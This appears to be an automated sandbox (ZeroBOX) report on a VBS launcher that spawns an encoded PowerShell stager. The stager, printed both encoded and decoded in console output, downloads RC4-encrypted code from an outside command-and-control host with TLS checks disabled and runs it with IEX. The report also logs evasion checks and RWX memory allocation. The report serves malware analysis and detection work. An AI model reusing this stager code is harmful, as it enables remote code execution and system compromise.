Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 3, 2023, 8:24 a.m.	April 3, 2023, 8:28 a.m.

Size	3.1KB
Type	ASCII text, with very long lines
MD5	`57681dd10fdf68cfd0ec1ef066440d47`
SHA256	`fe366917efb3a26fbf5e5316b4405427f2ea5ad8aaaffe9992f81475f341bb61`
CRC32	`D6ECC4C8`
ssdeep	`96:zl+rmhA7oIsj9FP2hdYBZ2vIjc4UbAy+Gi+vYbEB5Vp:zl7nxj9FP2I2v6/Uhi4qW`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\launcher.vbs
2608
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAQQBCAHAAQQBDADQAQQBiAFEAQgBwAEEASABNAEEAYwB3AEIAbABBAEcAUQBBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAYwBBAEIAaABBAEgASQBBAFkAdwBCAGwAQQBHAHcAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAHIAbwB1AHQAZQAuAHAAaABwACcAOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAawBtAFgAUQB4AHoAXwA8AGwANQBaAC4AMwB7AC0AKwA9AD4ATgByACoAfgBWAGQAeQBAADcASQAvAHwAOQB9ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgByAFUARQBCAHUASQA9AFgAZgBNAFkAZwByADMASwBEAFkAdgBBACsAMgA0ADcAcgA3ADUAaABOAEYAOQBEAHAAMQBrAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
  2704

Name	Response	Post-Analysis Lookup
api.missedglobalparcel.com	A 144.126.228.108	144.126.228.108

IP Address	Status	Action
144.126.228.108	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 3, 2023, 8:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2023, 8:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2023, 8:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2023, 8:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2023, 8:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2023, 8:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2023, 8:24 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 3, 2023, 8:24 a.m.			0	0

Command line console output was observed (50 out of 67 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th console_handle: 0x00000023	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: e remote server" console_handle: 0x0000002f	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: At line:1 char:1025 console_handle: 0x0000003b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: + If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]: console_handle: 0x00000047	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: :Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windo console_handle: 0x00000053	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ws NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointMan console_handle: 0x0000005f	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ager]::ServerCertificateValidationCallback = {$true};$ser=$([Text.Encoding]::Un console_handle: 0x0000006b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: icode.GetString([Convert]::FromBase64String('aAB0AHQAcABzADoALwAvAGEAcABpAC4AbQ console_handle: 0x00000077	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: BpAHMAcwBlAGQAZwBsAG8AYgBhAGwAcABhAHIAYwBlAGwALgBjAG8AbQA=')));$t='/route.php'; console_handle: 0x00000083	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: $wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebP console_handle: 0x0000008f	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: roxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCreden console_handle: 0x0000009b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: tials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('kmXQ console_handle: 0x000000a7	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: xz_<l5Z.3{-+=>Nr*~Vdy@7I/\|9}');$R={$D,$K=$Args;$S=0..255;0..255\|%{$J=($J+$S[$_] console_handle: 0x000000b3	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: +$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S console_handle: 0x000000bf	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: [$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Head console_handle: 0x000000cb	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ers.Add("Cookie","rUEBuI=XfMYgr3KDYvA+247r75hNF9Dp1k=");$data=$wc.DownloadData console_handle: 0x000000d7	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: <<<< ($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R console_handle: 0x000000e3	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: $data ($IV+$K))\|IEX console_handle: 0x000000ef	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000fb	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000107	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: Cannot index into a null array. console_handle: 0x0000001b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: At line:1 char:1045 console_handle: 0x00000027	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: + If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]: console_handle: 0x00000037	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: :Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windo console_handle: 0x00000047	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ws NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointMan console_handle: 0x00000053	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ager]::ServerCertificateValidationCallback = {$true};$ser=$([Text.Encoding]::Un console_handle: 0x0000005f	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: icode.GetString([Convert]::FromBase64String('aAB0AHQAcABzADoALwAvAGEAcABpAC4AbQ console_handle: 0x0000006b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: BpAHMAcwBlAGQAZwBsAG8AYgBhAGwAcABhAHIAYwBlAGwALgBjAG8AbQA=')));$t='/route.php'; console_handle: 0x00000077	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: $wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebP console_handle: 0x00000083	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: roxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCreden console_handle: 0x0000008f	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: tials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('kmXQ console_handle: 0x0000009b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: xz_<l5Z.3{-+=>Nr*~Vdy@7I/\|9}');$R={$D,$K=$Args;$S=0..255;0..255\|%{$J=($J+$S[$_] console_handle: 0x000000a7	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: +$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S console_handle: 0x000000b3	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: [$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Head console_handle: 0x000000bf	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ers.Add("Cookie","rUEBuI=XfMYgr3KDYvA+247r75hNF9Dp1k=");$data=$wc.DownloadData( console_handle: 0x000000cb	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: $ser+$t);$iv=$data[ <<<< 0..3];$data=$data[4..$data.length];-join[Char[]](& $R console_handle: 0x000000d7	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: $data ($IV+$K))\|IEX console_handle: 0x000000e3	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: + CategoryInfo : InvalidOperation: (System.Object[]:Object[]) [], console_handle: 0x000000ef	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: RuntimeException console_handle: 0x000000fb	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: + FullyQualifiedErrorId : NullArray console_handle: 0x00000107	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: Cannot index into a null array. console_handle: 0x00000127	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: At line:1 char:1063 console_handle: 0x00000133	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: + If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]: console_handle: 0x0000013f	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: :Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windo console_handle: 0x0000014b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ws NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointMan console_handle: 0x00000157	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: ager]::ServerCertificateValidationCallback = {$true};$ser=$([Text.Encoding]::Un console_handle: 0x00000163	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: icode.GetString([Convert]::FromBase64String('aAB0AHQAcABzADoALwAvAGEAcABpAC4AbQ console_handle: 0x0000016f	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: BpAHMAcwBlAGQAZwBsAG8AYgBhAGwAcABhAHIAYwBlAGwALgBjAG8AbQA=')));$t='/route.php'; console_handle: 0x0000017b	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: $wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebP console_handle: 0x00000187	1	1
WriteConsoleW April 3, 2023, 8:24 a.m.	buffer: roxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCreden console_handle: 0x00000193	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f32d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f33d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f33d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f33d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f33d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f33d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f33d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3758 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3c58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f3c58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06208fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06208fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2023, 8:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 3, 2023, 8:24 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 165 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02921000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02922000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ebb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
